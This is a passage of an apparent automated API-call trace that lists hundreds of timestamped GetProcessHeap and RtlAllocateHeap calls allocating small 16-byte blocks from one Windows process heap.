returned 0x2c0000 [0117.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e07d0 [0117.034] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e07f0 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0810 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0830 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0850 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0870 [0117.035] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e08c0 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e08e0 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0900 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0920 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0940 [0117.036] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0960 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0980 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e09a0 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) 
returned 0x2e09c0 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e09e0 [0117.037] GetProcessHeap () returned 0x2c0000 [0117.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a00 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a20 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a40 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a60 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0a80 [0117.038] GetProcessHeap () returned 0x2c0000 [0117.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0aa0 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ac0 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ae0 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b00 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b20 [0117.039] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b40 [0117.040] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b60 [0117.040] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0b80 [0117.040] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ba0 [0117.040] GetProcessHeap () returned 0x2c0000 [0117.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0bc0 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0be0 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c00 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c20 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c40 [0117.041] GetProcessHeap () returned 0x2c0000 [0117.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c60 [0117.108] GetProcessHeap () returned 0x2c0000 [0117.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0c80 [0117.108] GetProcessHeap () returned 0x2c0000 [0117.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ca0 [0117.109] GetProcessHeap () returned 0x2c0000 [0117.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0cc0 [0117.109] GetProcessHeap () returned 0x2c0000 [0117.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ce0 [0117.109] GetProcessHeap () returned 0x2c0000 [0117.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d00 [0117.109] GetProcessHeap () returned 0x2c0000 [0117.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d20 [0117.110] GetProcessHeap () returned 0x2c0000 [0117.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d40 [0117.110] GetProcessHeap () returned 0x2c0000 [0117.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d60 [0117.110] GetProcessHeap () 
returned 0x2c0000 [0117.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0d80 [0117.110] GetProcessHeap () returned 0x2c0000 [0117.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0da0 [0117.111] GetProcessHeap () returned 0x2c0000 [0117.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0dc0 [0117.111] GetProcessHeap () returned 0x2c0000 [0117.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0de0 [0117.111] GetProcessHeap () returned 0x2c0000 [0117.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e00 [0117.111] GetProcessHeap () returned 0x2c0000 [0117.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e20 [0117.112] GetProcessHeap () returned 0x2c0000 [0117.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e40 [0117.112] GetProcessHeap () returned 0x2c0000 [0117.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e60 [0117.112] GetProcessHeap () returned 0x2c0000 [0117.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0e80 [0117.112] GetProcessHeap () returned 0x2c0000 [0117.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ea0 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ec0 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0ee0 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f00 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f20 [0117.113] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) 
returned 0x2e0f40 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f60 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0f80 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0fa0 [0117.114] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0fc0 [0117.115] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e0fe0 [0117.115] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1000 [0117.115] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1020 [0117.115] GetProcessHeap () returned 0x2c0000 [0117.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1040 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1060 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e10c0 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e10e0 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1100 [0117.116] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1120 [0117.117] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1140 [0117.117] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1160 [0117.117] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1180 [0117.117] GetProcessHeap () returned 0x2c0000 [0117.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e11a0 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e11c0 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e11e0 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1200 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1220 [0117.118] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1240 [0117.119] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1260 [0117.119] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1280 [0117.119] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e12a0 [0117.119] GetProcessHeap () returned 0x2c0000 [0117.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e12c0 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e12e0 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1300 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1320 [0117.120] GetProcessHeap () 
returned 0x2c0000 [0117.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1340 [0117.120] GetProcessHeap () returned 0x2c0000 [0117.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1360 [0117.121] GetProcessHeap () returned 0x2c0000 [0117.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1380 [0117.121] GetProcessHeap () returned 0x2c0000 [0117.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e13a0 [0117.121] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e13c0 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e13e0 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1400 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1420 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1440 [0117.122] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1460 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1480 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e14a0 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e14c0 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e14e0 [0117.123] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) 
returned 0x2e1500 [0117.124] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1520 [0117.124] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1540 [0117.124] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1560 [0117.124] GetProcessHeap () returned 0x2c0000 [0117.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1580 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e15a0 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e15c0 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e15e0 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1600 [0117.125] GetProcessHeap () returned 0x2c0000 [0117.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1620 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1640 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1660 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1680 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e16a0 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e16c0 [0117.126] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e16e0 [0117.127] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1700 [0117.127] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1720 [0117.127] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1740 [0117.127] GetProcessHeap () returned 0x2c0000 [0117.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1760 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1780 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e17a0 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e17c0 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e17e0 [0117.128] GetProcessHeap () returned 0x2c0000 [0117.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1800 [0117.129] GetProcessHeap () returned 0x2c0000 [0117.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1820 [0117.129] GetProcessHeap () returned 0x2c0000 [0117.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1840 [0117.129] GetProcessHeap () returned 0x2c0000 [0117.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1860 [0117.129] GetProcessHeap () returned 0x2c0000 [0117.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e18c0 [0117.130] GetProcessHeap () returned 0x2c0000 [0117.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e18e0 [0117.130] GetProcessHeap () 
returned 0x2c0000 [0117.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1900 [0117.130] GetProcessHeap () returned 0x2c0000 [0117.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1920 [0117.130] GetProcessHeap () returned 0x2c0000 [0117.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1940 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1960 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1980 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e19a0 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e19c0 [0117.131] GetProcessHeap () returned 0x2c0000 [0117.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e19e0 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a00 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a20 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a40 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a60 [0117.132] GetProcessHeap () returned 0x2c0000 [0117.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1a80 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1aa0 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) 
returned 0x2e1ac0 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ae0 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b00 [0117.133] GetProcessHeap () returned 0x2c0000 [0117.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b20 [0117.134] GetProcessHeap () returned 0x2c0000 [0117.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b40 [0117.134] GetProcessHeap () returned 0x2c0000 [0117.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b60 [0117.134] GetProcessHeap () returned 0x2c0000 [0117.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1b80 [0117.134] GetProcessHeap () returned 0x2c0000 [0117.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ba0 [0117.135] GetProcessHeap () returned 0x2c0000 [0117.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1bc0 [0117.135] GetProcessHeap () returned 0x2c0000 [0117.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1be0 [0117.135] GetProcessHeap () returned 0x2c0000 [0117.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c00 [0117.136] GetProcessHeap () returned 0x2c0000 [0117.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c20 [0117.136] GetProcessHeap () returned 0x2c0000 [0117.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c40 [0117.136] GetProcessHeap () returned 0x2c0000 [0117.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c60 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1c80 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ca0 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1cc0 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ce0 [0117.137] GetProcessHeap () returned 0x2c0000 [0117.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d00 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d20 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d40 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d60 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1d80 [0117.138] GetProcessHeap () returned 0x2c0000 [0117.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1da0 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1dc0 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1de0 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e00 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e20 [0117.139] GetProcessHeap () returned 0x2c0000 [0117.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e40 [0117.140] GetProcessHeap () returned 0x2c0000 [0117.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e60 [0117.140] GetProcessHeap () 
returned 0x2c0000 [0117.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1e80 [0117.140] GetProcessHeap () returned 0x2c0000 [0117.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ea0 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ec0 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1ee0 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f00 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f20 [0117.141] GetProcessHeap () returned 0x2c0000 [0117.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2e1f40 [0117.141] GetProcessHeap 